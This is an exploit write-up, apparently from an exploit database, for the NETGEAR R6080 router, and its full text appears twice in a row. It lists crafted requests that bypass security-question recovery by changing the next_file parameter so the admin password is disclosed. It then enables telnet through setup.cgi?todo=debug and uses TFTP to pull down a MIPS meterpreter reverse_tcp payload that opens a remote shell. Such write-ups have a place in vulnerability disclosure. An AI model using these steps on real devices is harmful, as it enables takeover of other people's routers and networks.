# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: R6080-100PES # Firmware Version: 1.0.0.34 / 1.0.0.40 # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip) == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) SSSSSSSNNNNNN == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] } # Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: R6080-100PES # Firmware Version: 1.0.0.34 / 1.0.0.40 # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip) == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) SSSSSSSNNNNNN == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] }